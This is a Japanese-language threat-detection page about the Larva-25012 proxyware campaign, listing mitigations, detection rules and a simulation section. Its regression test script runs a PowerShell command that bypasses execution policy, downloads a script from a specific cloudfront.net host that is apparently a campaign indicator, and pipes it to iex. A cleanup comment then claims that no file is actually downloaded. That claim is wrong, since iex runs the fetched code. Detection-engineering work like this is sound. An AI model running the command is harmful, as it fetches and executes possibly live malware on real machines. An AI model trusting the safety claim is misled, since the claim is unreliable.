Larva-25012: 2026年のプロキシウェア配布キャンペーン
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Larva-25012 脅威アクターは、ユーザーのインターネット帯域幅を乗っ取ることで、侵害されたシステムをマネタイズするためにProxywareを積極的に配布しています。このキャンペーンは既存のDPLoader感染に基づいており、YouTubeダウンロードウェブサイトやGitHubを含む複数の配布チャネルに依存しています。このマルウェアは、DigitalPulse、SOAX、Appsalt、IPRoyalを含むいくつかのProxywareファミリーを展開します。
調査
AhnLabセキュリティインテリジェンスセンター(ASEC)は進行中のプロキシジャック活動を追跡し、2026年後半に更新されたLarva-25012の操作を特定しました。調査では、攻撃者が持続性を維持しPowerShellコマンドを実行するためにDPLoaderのJavaScriptとPythonバージョンの両方を利用していることが判明しました。また、スケジュールされたタスクも作成され、侵害されたシステムで悪意のあるスクリプトが継続して実行されるようにします。
緩和策
ユーザーは、疑わしいウェブサイト、ポップアップ広告、または非公式のファイル共有プラットフォームから実行ファイルをダウンロードすることを避けるべきです。ソフトウェアは信頼できる正規のソースからのみ入手し、クラックされたアプリケーションや違法なダウンロードサイトは避けるべきです。組織は、V3を含むエンドポイント保護ソリューションを最新の状態に保つべきです。
対応策
疑わしい活動が検出された場合、管理者は影響を受けたProxywareファミリーに関連する悪意のあるPowerShellプロセスやスケジュールされたタスクを特定して終了するべきです。また、キーファクターとしての感染と持続性の役割を果たすDPLoaderを確認し、既知または疑わしいC2インフラへの無許可接続を含む外向きネットワークトラフィックを確認するべきです。
攻撃フロー
この部分はまだ更新中です。
検出
Powershellを介したダウンロードまたはアップロード (cmdline経由)
疑わしいNodeJS子プロセス[Windows] (cmdline経由)
Windows Defenderリアルタイムモニタリングの無効化とその他の設定変更 (cmdline経由)
Powershellからの疑わしい.NETメソッドの呼び出し (powershell経由)
Cloudflare開発ドメインの悪用の可能性 (dns経由)
IOC(HashMd5)で検出: Larva-25012: 2026年のProxyware配布キャンペーン
PowerShell Proxywareインストールスクリプトの検出 [Windows Powershell]
シミュレーション実行
-
攻撃のストーリー&コマンド: 許可されていない帯域幅使用のためにプロキシウェア(Larva-25012)をインストールしようとする敵対者は、PowerShellワンライナーを実行します。目的は、ペイロードをメモリに直接ダウンロードすることでローカルファイルスキャンを回避することです。彼らは、
-ExecutionPolicy Bypassフラグを使用してスクリプトが実行されるようにし、iwrCloudfront配信からファイルを取得し、iexにパイプして即座に実行します。この特定のコマンドラインは、検出ルールのターゲットとなるシグネチャの一つです。 -
リグレッションテストスクリプト:
# Larva-25012 Proxywareインストールのシミュレーション # このコマンドは、検出ルールのselection2に一致するよう具体的に設計されています。 $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"' # コマンドラインが新しいプロセスイベントとしてキャプチャされるようにStart-Processを使用します Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`"" -
クリーンアップコマンド:
# シミュレーションの'iex'パイプの性質により、実際にファイルがダウンロードされることはありませんが、 # アーティファクトが作成された場合、ここで削除されます。 Write-Host "シミュレーションクリーンアップ完了。持続するアーティファクトは作成されませんでした。"